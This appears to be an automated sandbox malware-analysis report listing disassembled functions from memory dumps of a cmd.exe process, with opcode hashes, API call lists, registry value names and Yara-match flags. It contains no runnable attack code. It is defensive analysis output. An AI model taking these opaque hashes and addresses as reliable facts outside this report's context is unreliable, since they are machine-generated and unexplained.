                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7d70af39d8d6547af0d7280cf6b5cbd4878f1fedf4bfe0eb1e4ebd01e05e4681
                                                                                        • Instruction ID: 95cc9bfcdc8b0c87615ab8c3cb5098e0bc69e60315da205131b479008a2807bc
                                                                                        • Opcode Fuzzy Hash: 7d70af39d8d6547af0d7280cf6b5cbd4878f1fedf4bfe0eb1e4ebd01e05e4681
                                                                                        • Instruction Fuzzy Hash: EAF08274A00248AFDB14EBB9D556E9EBBB8AF09708F5404A9B601EF6C0EAB4D9008754
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B9F7CF Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6ec4402406eddce8671f948696e1b65baf57e7b97aa269abca842517ffe25852
                                                                                        • Instruction ID: 4d326033e37635ef8243fb423710e40dece201a6bfa66d931b881e3ba54ed8db
                                                                                        • Opcode Fuzzy Hash: 6ec4402406eddce8671f948696e1b65baf57e7b97aa269abca842517ffe25852
                                                                                        • Instruction Fuzzy Hash: 3AF08274A01248EFDB04DBA9D55AA9EB7B8AF08708F4400E9F601EF2C0E974D9008714
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03BB3336 Relevance: .0, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                                        • Instruction ID: 6e5a94952ef5085d3e7ba5fb0b67ac4ac3f7b401c3bd3725d00aec6505ac17e0
                                                                                        • Opcode Fuzzy Hash: c0008614389e4c6b7c8f3a5444dc37d698eba2a91f3b45f08bbf5d080c4fc888
                                                                                        • Instruction Fuzzy Hash: A7E06576210200BFEB25DB48CD05FE6B3ECEB00724F1802A9B1299A1D0DFB0FE40CA60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AD81EB Relevance: .0, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                        • Instruction ID: 4420a441bcd952581a62fe39f43769c22dafc7eeb25edad524130c6e0e3447db
                                                                                        • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                        • Instruction Fuzzy Hash: F0E08C36040620EEDB31EB20DC00F517BB9EF41714F250AABF08B0A4A48BB89885DA49
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03ADA093 Relevance: .0, Instructions: 15COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                        • Instruction ID: 6bf530912d8462542d9d11ab2cf857f9924096bd03442cb87b8629b760cb0625
                                                                                        • Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
                                                                                        • Instruction Fuzzy Hash: 42D0123720607097CF39AB957A24F67BA159B81A90F1A006E790B97944C5148C42D6E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02DE6CEB Relevance: .0, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_2dd0000_cmd.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 23f7d22a133096a1b046eeaa3b4b29fa3f95a52c58417640bdba188bdba4878a
                                                                                        • Instruction ID: 0eec78562824e58bf4331be21e3ccd91a7fc1c7a0d83e70eb26db6357782b9c8
                                                                                        • Opcode Fuzzy Hash: 23f7d22a133096a1b046eeaa3b4b29fa3f95a52c58417640bdba188bdba4878a
                                                                                        • Instruction Fuzzy Hash: 69B09226F590590449111C0878410F8FB35888B02AF1032D3D84CB74018102C419018A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AF01C0 Relevance: .0, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                        • Instruction ID: 0ae82ce2589e5826a8dd2e9be093648865f6784b5710424acbd88ab407a10d1a
                                                                                        • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                        • Instruction Fuzzy Hash: 70D0C935312D80CFD71ACB0DC894B0573A8FB44B44F8504E0E801CB722D22CD944CA04
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B00230 Relevance: .0, Instructions: 11COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                        • Instruction ID: 0ddddf04f7e086dadd132fc9fbd8cf4c0a872deacd3cf0b267205480948826aa
                                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                        • Instruction Fuzzy Hash: 7FD0123610024CEFCB01EF40C850E5A7B2AFFC8710F108019FD190B6508A31ED62DA50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B0332D Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                        • Instruction ID: c4809ea7a23139a19877d74234ee65374c68c6a125ec968e23252dfbbe2904b7
                                                                                        • Opcode Fuzzy Hash: 2cd7a0cba40542002f5a7f393242cee2f830ad860d51489f93f91c1395f24a2a
                                                                                        • Instruction Fuzzy Hash: 0AC0807C1413406EDF26D710C954B243A94EB00A09F4C01EC76441D4D1C759E5018204
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B24260 Relevance: .0, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5944a38a0e61ffab93174410bd8a797b9ed49990df260aba81e0b26f1c1e3f7e
                                                                                        • Instruction ID: d8f3b8f0af65c6921db20bdfb16d989e4e4e160a212ba46c51615fab87bd692e
                                                                                        • Opcode Fuzzy Hash: 5944a38a0e61ffab93174410bd8a797b9ed49990df260aba81e0b26f1c1e3f7e
                                                                                        • Instruction Fuzzy Hash: 7C900232605414129540B15849845465005D7E1305B51C465F0418554CDB24895A6362
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D687CA Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 270memorylibraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00D9CA04), ref: 00D687EE
                                                                                        • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D687FA
                                                                                        • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D6880E
                                                                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00D87460,00000001), ref: 00D6881B
                                                                                        • _get_osfhandle.MSVCRT ref: 00D68828
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68830
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6883C
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68844
                                                                                          • Part of subcall function 00D6E310: _get_osfhandle.MSVCRT ref: 00D6E318
                                                                                          • Part of subcall function 00D6E310: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E322
                                                                                          • Part of subcall function 00D6E310: _get_osfhandle.MSVCRT ref: 00D6E32F
                                                                                          • Part of subcall function 00D6E310: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E339
                                                                                          • Part of subcall function 00D6E310: _get_osfhandle.MSVCRT ref: 00D6E35E
                                                                                          • Part of subcall function 00D6E310: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E368
                                                                                          • Part of subcall function 00D6E310: _get_osfhandle.MSVCRT ref: 00D6E390
                                                                                          • Part of subcall function 00D6E310: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E39A
                                                                                          • Part of subcall function 00D6A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00D6A9C5), ref: 00D6A9D8
                                                                                          • Part of subcall function 00D6A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00D6A9F3
                                                                                          • Part of subcall function 00D6A9D4: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6A9FA
                                                                                          • Part of subcall function 00D6A9D4: memcpy.MSVCRT ref: 00D6AA09
                                                                                          • Part of subcall function 00D6A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00D6AA12
                                                                                          • Part of subcall function 00D68B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00D6885E), ref: 00D68B9D
                                                                                          • Part of subcall function 00D68B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6885E), ref: 00D68BA4
                                                                                          • Part of subcall function 00D68273: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00D682D3
                                                                                          • Part of subcall function 00D68273: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 00D68313
                                                                                          • Part of subcall function 00D68273: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00D6834D
                                                                                          • Part of subcall function 00D68273: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00D6839D
                                                                                          • Part of subcall function 00D68273: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 00D683D7
                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D6886A
                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00D688A5
                                                                                        • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00D68987
                                                                                        • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000000,-00000105,00000000), ref: 00D689AB
                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D689BC
                                                                                          • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001E,00D9C9E0,00000008), ref: 00D6859E
                                                                                          • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 00D685BC
                                                                                          • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00D68614
                                                                                          • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00D68653
                                                                                          • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,00D9C9D0,00000008), ref: 00D6867D
                                                                                          • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,00D9C970,00000020), ref: 00D68698
                                                                                          • Part of subcall function 00D68572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,00D9C930,00000020), ref: 00D686B0
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 00D689CD
                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D689D4
                                                                                        • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 00D689E9
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00D68A23
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00D68A2A
                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00D68AB5
                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00D68AC0
                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00D68AD1
                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00D68AE7
                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00D68AF8
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D68B18
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressAllocCriticalProcProcessSection$CommandEnvironmentFreeHandleLineStrings$BufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsmemcpy
                                                                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                        • API String ID: 2256129397-3021193919
                                                                                        • Opcode ID: 948bef4e67e7f7723008a6c0627b2489077863e717e1277d83d4dfb720d8dbce
                                                                                        • Instruction ID: 73a2392fdb94f5ce37af8f61dcd46a6c9e6db3b6f4aa91e1fbf5ce628939c462
                                                                                        • Opcode Fuzzy Hash: 948bef4e67e7f7723008a6c0627b2489077863e717e1277d83d4dfb720d8dbce
                                                                                        • Instruction Fuzzy Hash: D191B371A40301AFDB14ABA8EC1AA7A37B5EB45701B08461AF506D73A1EF70DC41EB36
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D68273 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 309registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 00D682D3
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableUNCCheck,00000000,?,?,?), ref: 00D68313
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,EnableExtensions,00000000,00000001,?,00001000), ref: 00D6834D
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 00D6839D
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DefaultColor,00000000,00000001,?,00001000), ref: 00D683D7
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,CompletionChar,00000000,00000001,?,00001000), ref: 00D68427
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,PathCompletionChar,00000000,00000001,?,00001000), ref: 00D68498
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,AutoRun,00000000,00000004,?,00001000), ref: 00D68526
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D6853A
                                                                                        • time.MSVCRT ref: 00D68554
                                                                                        • srand.MSVCRT ref: 00D6855B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue$CloseOpensrandtime
                                                                                        • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                        • API String ID: 145004033-3846321370
                                                                                        • Opcode ID: 2ccbc194be76a9531fb5c7d7c5ff30efcf32667bc21b8ad3efa5ec7e1424e48f
                                                                                        • Instruction ID: ac872a7f3d8abb45c414373d1927b555cc391ee4ef9334a456ea1ea3632376a7
                                                                                        • Opcode Fuzzy Hash: 2ccbc194be76a9531fb5c7d7c5ff30efcf32667bc21b8ad3efa5ec7e1424e48f
                                                                                        • Instruction Fuzzy Hash: ACC17435900299EBDF328B54DD04BD97778FB09702F1081D6E589E2290EBB49AC8DF39
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D64710 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 435fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D64781
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • _get_osfhandle.MSVCRT ref: 00D647E4
                                                                                        • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00D647EC
                                                                                        • _get_osfhandle.MSVCRT ref: 00D647FD
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D64805
                                                                                          • Part of subcall function 00D6A16C: _close.MSVCRT ref: 00D6A19B
                                                                                        • _get_osfhandle.MSVCRT ref: 00D64832
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 00D6483A
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D64871
                                                                                        • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000001), ref: 00D78120
                                                                                        • memmove.MSVCRT ref: 00D78191
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,?,00000000), ref: 00D78328
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D7832F
                                                                                          • Part of subcall function 00D6DD98: _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                          • Part of subcall function 00D6DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File_get_osfhandle$memset$ConsoleHandlePathPointerReadSearchSizeTypeWrite_closememmove
                                                                                        • String ID: DPATH
                                                                                        • API String ID: 2545859659-2010427443
                                                                                        • Opcode ID: 212ef73744715e6e69f123d2edc7a1d2fac1187f3c557dc5125eecfac08226e5
                                                                                        • Instruction ID: 432d42a9225c9902758eac97546d46dd4c06f03e5cb34afe4831c4f74d1e80f1
                                                                                        • Opcode Fuzzy Hash: 212ef73744715e6e69f123d2edc7a1d2fac1187f3c557dc5125eecfac08226e5
                                                                                        • Instruction Fuzzy Hash: 0CF19D715483419FD724DF24C848B6BB7E9EB88714F148A2EF889D7290EB70D805DBB6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D709B1 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242registrythreadmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00D709CB
                                                                                        • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 00D709D8
                                                                                        • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00D709ED
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00D70A0A
                                                                                        • _setjmp3.MSVCRT ref: 00D70A72
                                                                                        • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00D70AA3
                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D70AB4
                                                                                        • exit.MSVCRT ref: 00D70ADA
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 00D7E9E1
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D7E9EA
                                                                                          • Part of subcall function 00D71F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,00D7EF7C,?,00000000,00000000), ref: 00D71FB2
                                                                                          • Part of subcall function 00D71F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,00D7EF7C,?,00000000,00000000), ref: 00D71FCE
                                                                                          • Part of subcall function 00D71F1A: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00D70A41), ref: 00D71F1A
                                                                                          • Part of subcall function 00D71F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00D9C9F0), ref: 00D71F2B
                                                                                          • Part of subcall function 00D71F1A: memset.MSVCRT ref: 00D71F45
                                                                                          • Part of subcall function 00D687CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00D9CA04), ref: 00D687EE
                                                                                          • Part of subcall function 00D687CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D687FA
                                                                                          • Part of subcall function 00D687CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00D6880E
